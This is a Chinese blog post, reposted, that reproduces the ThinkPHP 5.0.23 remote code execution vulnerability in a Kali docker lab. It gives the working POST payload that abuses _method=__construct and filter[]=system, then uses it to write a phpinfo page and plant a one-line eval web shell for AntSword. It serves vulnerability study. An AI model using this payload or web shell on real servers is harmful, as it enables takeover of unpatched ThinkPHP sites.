Thinkphp5.0.23 rce(远程代码执行)的漏洞复现
漏洞形成原因
- 框架介绍: ThinkPHP是一款运用极广的PHP开发框架。
- 漏洞引入: 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。
漏洞如何利用
- 1、访问靶机地址+端口号 进入首页
- 2、Burp抓包修改传参方式为Post,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd为系统执行命令可进行一系列操作。
漏洞复现过程
- Kali docker 容器中启动此漏洞环境
- 浏览器访问 Kali 的 ip 地址接上8080端口
- Burp抓包修改传参方式为Post,url后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。
/index.php?s=captch #url后接
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd #POST传入参数
- Burp Go
- 尝试写入phpinfo
echo"<?php phpinfo(); ?>"> info.php
- 成功!
- 写入一句话
echo'<?php eval($_POST[aaa]); ?>'> shell.php #密码:aaa
- 上蚁剑!
- 漏洞复现成功 参考文章:https://www.cnblogs.com/zenb/p/14537240.html 技术萌新,还请各位大牛多多指点!
本文转载自: https://blog.csdn.net/cscscys/article/details/121792631
版权归原作者 Peanut886886 所有, 如有侵权,请联系我们删除。
版权归原作者 Peanut886886 所有, 如有侵权,请联系我们删除。